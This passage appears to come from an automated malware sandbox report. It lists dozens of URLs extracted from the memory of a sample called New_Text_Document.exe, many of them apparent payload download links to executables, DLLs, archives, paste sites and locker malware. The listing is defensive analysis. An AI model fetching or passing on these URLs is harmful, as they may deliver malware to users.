                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mooya.co.za/uiqq/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://moucecore.org/es/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://moucecore.org/es/?45316141
                    Source: raserver.exe, 00000014.00000003.1558158883.0000000007CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mozilla.org0/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mphasistech.com/ns/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mpvworld.com/uamt/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mrbusinessadvertiser.com/aqu/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myekisan.com/mrq/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myekisan.com/nt/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myekisan.com/suta/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myguitarcenter.ir/aoq/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mysura.it/njtzac0.tar
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nassifenterprise.com/qa/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://networkwheels.co.za/no61soo9m.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://newvitec360.com/uaq/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ngwcscyd.page.link/KrvS7LqTXrouZ8fK7
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nicolewilliamsgossip.co.uk/nen/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://niveen.net/ovit/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nkdairyequipment.com/gte/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://northgatebakery.ca/eco/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://norwalkbaptist.com/teet/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://notaire-gay-friendly.fr/agenzia/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://notaire-gay-friendly.fr/scarica/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ns1.koleso.tc/b512c9bf0b/RnLGmaMVRRbyeY3nZb/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nsb.org.uk/plesk-stat/closed_section/verified_profile/le2_3ws89vz2/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://obikua.com/tr/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://obstetric-ultrasound.com/camu/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oceancityrentalbyowner.com/epix12dx.rar
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oceanicservices.in/tcr/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oceanicservices.in/tcr/?90285141
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oceaniteservices.in/pcs/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://octopia.com.ar/aie/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogumeta.github.io/gmjggzt/01.06.2023_Genel_Siparislerimiz.xlsx
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogumeta.github.io/iqae/czlkm.png
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogumeta.github.io/p17m/Siparis_listesi.docx
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogumeta.github.io/vwui/kyhla.png
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oilmex.mx/usit/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://olugun.co.za/home/micors.scr
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://omegaservices.fr/eieb/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://omniacafe.com/eian/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclickbuy.pk/qiu/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneey.xyz/bep/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oqily.com/uuie/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://orderedami.com/svcrun.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://orgsaojorge.com.br/emn/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://orlcasablanca.com/wp-content/uploads/Setup_pass1234.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://orsan.gruporhynous.com/tattered.php
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://outdoortacklebox.com/1.dll
                    Source: explorer.exe, 0000000C.00000000.1312346993.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pablobrothel.com.ar/local-cgi/SXKBJ63P7ttLbh2AiiLtMzS/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pablobrothel.com.ar/local-cgi/jrxl2ncx/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://padlet-uploads.storage.googleapis.com/500279229/c4d1ce167d49df4f2206a5fe210b189f/WinLocker.e
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://padlet-uploads.storage.googleapis.com/500279229/dfd16dbfc5b6c3ac5e3468e0929d1973/KarLocker_e
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://padlet-uploads.storage.googleapis.com/500279229/ebc8ef7d87c522e51b4dc3429f48d2db/SystemCrash
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pagamento.afya.com.br/_framework/ABC.Client.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://parrotbay.net/wisr1qas.jpg
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://partotaprayan.com/aq/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://partotaprayan.com/aq/?35185141
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/L8KkK6We
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pasteio.com/download/xFmftXmFneEF
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pasteio.com/download/xpQ3RFXbtxKz
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pasteio.com/download/xwxy5N0WkwGU
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pasteio.com/download/xxMqIn6lCz5s
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://patos.mx/uiam/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://phoenicia-mtc.com/de/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pinakjewels.com/miet/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pmjo.fra1.cdn.digitaloceanspaces.com/1712.exe
